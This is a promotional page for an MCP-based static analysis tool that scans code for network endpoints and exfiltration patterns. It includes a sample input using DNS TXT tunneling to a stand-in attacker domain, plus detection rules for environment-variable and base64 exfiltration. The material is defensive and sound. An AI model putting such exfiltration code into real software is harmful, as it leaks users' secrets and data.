Interactive Security Tool

Network Traffic Inspector

Scan source code for network activity patterns. Extract URLs, build domain maps, and detect suspicious exfiltration vectors before deployment.

Install

Get the CLI Tool

Run the network inspector locally as an MCP server, or try it online below.

npx @clinetools/net-inspector
Requires Node.js 18+
  • URL and endpoint extraction from source code
  • Domain mapping with call frequency analysis
  • Exfiltration pattern detection (DNS tunneling, env leaks)
  • Risk scoring: CLEAN / LOW / MEDIUM / HIGH / CRITICAL
  • Zero config — just run with npx
Tutorial

How to Use It

Three ways to inspect network patterns in code — pick the one that fits your workflow.

1

Try Online

Use the interactive demo below to paste code and get an instant network analysis — no install needed.

↓ Jump to interactive demo
2

Use via CLI

Run as a local MCP server and connect any MCP-compatible client.

npx @clinetools/net-inspector
3

Add to Cline / Claude Code

Add the tool to your MCP settings for instant access from your AI assistant.

"net-inspector": { "command": "npx", "args": ["@clinetools/net-inspector"] }

MCP Client Configuration 

{
  "mcpServers": {
    "net-inspector": {
      "command": "npx",
      "args": ["@clinetools/net-inspector"]
    }
  }
}

Example: inspect_network — clean API client (low risk) 

// Call the tool with source code:
inspect_network({ code: "const res = await fetch('http://localhost:3000/api/users');" })

// Output:
{
  "endpoints": [
    { "url": "http://localhost:3000/api/users", "method": "GET", "classification": "internal" }
  ],
  "domain_map": {
    "localhost:3000": { "calls": 1, "methods": ["GET"], "classification": "internal" }
  },
  "suspicious_patterns": [],
  "risk_level": "CLEAN",
  "summary": "1 endpoint found. All traffic is internal (localhost). No suspicious patterns."
}

Example: inspect_network — suspicious server (HIGH risk, exfiltration) 

// Call with suspicious server code:
inspect_network({ code: "dns.resolve(`${chunk}.evil-domain.com`, 'TXT', () => {});" })

// Output:
{
  "endpoints": [
    { "url": "${chunk}.evil-domain.com", "method": "DNS", "classification": "external" },
    { "url": "process.env.EXFIL_ENDPOINT", "method": "POST", "classification": "dynamic" },
    { "url": "https://telemetry.suspicious-domain.io/beacon", "method": "POST", "classification": "external" }
  ],
  "domain_map": {
    "evil-domain.com": { "calls": 1, "methods": ["DNS"], "classification": "external" },
    "suspicious-domain.io": { "calls": 1, "methods": ["POST"], "classification": "external" },
    "[dynamic]": { "calls": 1, "methods": ["POST"], "classification": "dynamic" }
  },
  "suspicious_patterns": [
    { "severity": "critical", "pattern": "DNS Tunneling", "description": "DNS TXT query with encoded data in subdomain" },
    { "severity": "high", "pattern": "Environment Exfiltration", "description": "process.env piped into request body" },
    { "severity": "high", "pattern": "Base64 Encoding Near Network", "description": "Data encoded to base64 before transmission" }
  ],
  "risk_level": "HIGH",
  "summary": "3 endpoints, 2 external domains, 3 suspicious patterns. HIGH risk."
}
Live Demo

Try It Online

Paste source code to extract URLs, map domains, and detect suspicious network patterns.

Paste Source Code

Supports JavaScript, TypeScript, or any code with network calls

Try a demo:

Paste code and click Inspect Network to extract URLs, map domains, and detect suspicious patterns.

How It Works

What the Inspector Analyzes

Static analysis of source code to map every network vector and flag suspicious patterns before deployment.

URL Extraction

Static analysis extracts URLs from string literals, template literals, and variable assignments. Even URLs built dynamically from env vars are flagged.

Domain Classification

Endpoints are classified as internal (localhost, 127.0.0.1), external (real domains), or dynamic (variable-based). External + dynamic destinations need the most scrutiny.

Exfiltration Detection

Classic exfiltration patterns: base64-encoding data before sending, using DNS TXT queries as covert channels, or flowing process.env into request bodies.

Protocol Coverage

Scans HTTP (fetch, axios, got), WebSocket (ws, socket.io), DNS (dns.resolve, dns.lookup), and raw TCP (net.createConnection). All network vectors covered.

Context Analysis

A fetch to api.stripe.com is expected in a payment module. The same fetch in a logging module is suspicious. Context matters — but any external call deserves review.

Supply Chain Risks

MCP servers with broad network access can exfiltrate your code, credentials, and data. Inspect every outbound endpoint before granting network permissions.

Want Deep Network Analysis?

Submit your MCP server for a comprehensive network security audit.

Submit for Review